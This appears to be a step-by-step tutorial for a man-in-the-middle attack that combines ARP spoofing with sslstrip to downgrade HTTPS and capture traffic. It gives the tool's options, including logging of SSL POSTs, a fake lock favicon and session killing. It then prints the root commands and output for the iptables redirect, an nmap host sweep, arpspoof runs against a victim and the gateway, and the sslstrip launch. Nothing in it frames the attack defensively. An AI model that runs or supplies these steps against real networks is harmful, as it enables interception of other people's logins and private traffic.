sslstrip is a tool that transparently hijacks HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
-w <filename>, --write=<filename> Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l <port>, --listen=<port> Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message.
Enable IP Forwarding
To allow traffic to flow through our machine, IP forwarding needs to be enabled. Open a terminal and run the following command
Add an IP Tables Rule to Redirect Traffic to SSLStrip
This adds an IP Tables rule so that our machine knows how to handle incoming traffic from the victim. The following rule will take any traffic originally destined for port 80 (HTTP, web traffic) and redirect it to port 8080, which SSLStrip will be running on.
root@cyborg:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Identify Target and Gateway IP Addresses
root@cyborg:~# nmap -sP -T4 192.168.1.1/24
This is where the meat of the attack takes place. Address Resolution Protocol, or ARP, is what is responsible for mapping IP addresses to MAC addresses. These mappings are stored in an ARP table on each machine connected to the network.
The ARP spoofing attack sends out false information to the machine you’re attacking, repeatedly telling it that the gateway IP address has changed. The IP address we give it is that of your machine. So now the victim thinks that you are the gateway, and will send all of it’s outgoing traffic to you!
We also need to ARP spoof the gateway as well, to make it think that you are the victim’s machine. By doing this attack, you are essentially becoming the Man In The Middle.
To ARP Spoof the victim:
arpspoof -i <interface> -t <target IP> <gateway IP>
root@cyborg:~# arpspoof -i eth0 -t 192.168.1.18 192.168.1.1 0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93 0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93
To ARP Spoof the gateway router :
arpspoof -i <interface> -t <gateway IP> <target IP>
root@cyborg:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.18 0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93 0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93
Run these commands in their own separate terminal tabs so that you can flick between them and monitor each one.
root@cyborg:~# sslstrip -k -l 8080 sslstrip 0.9 by Moxie Marlinspike running...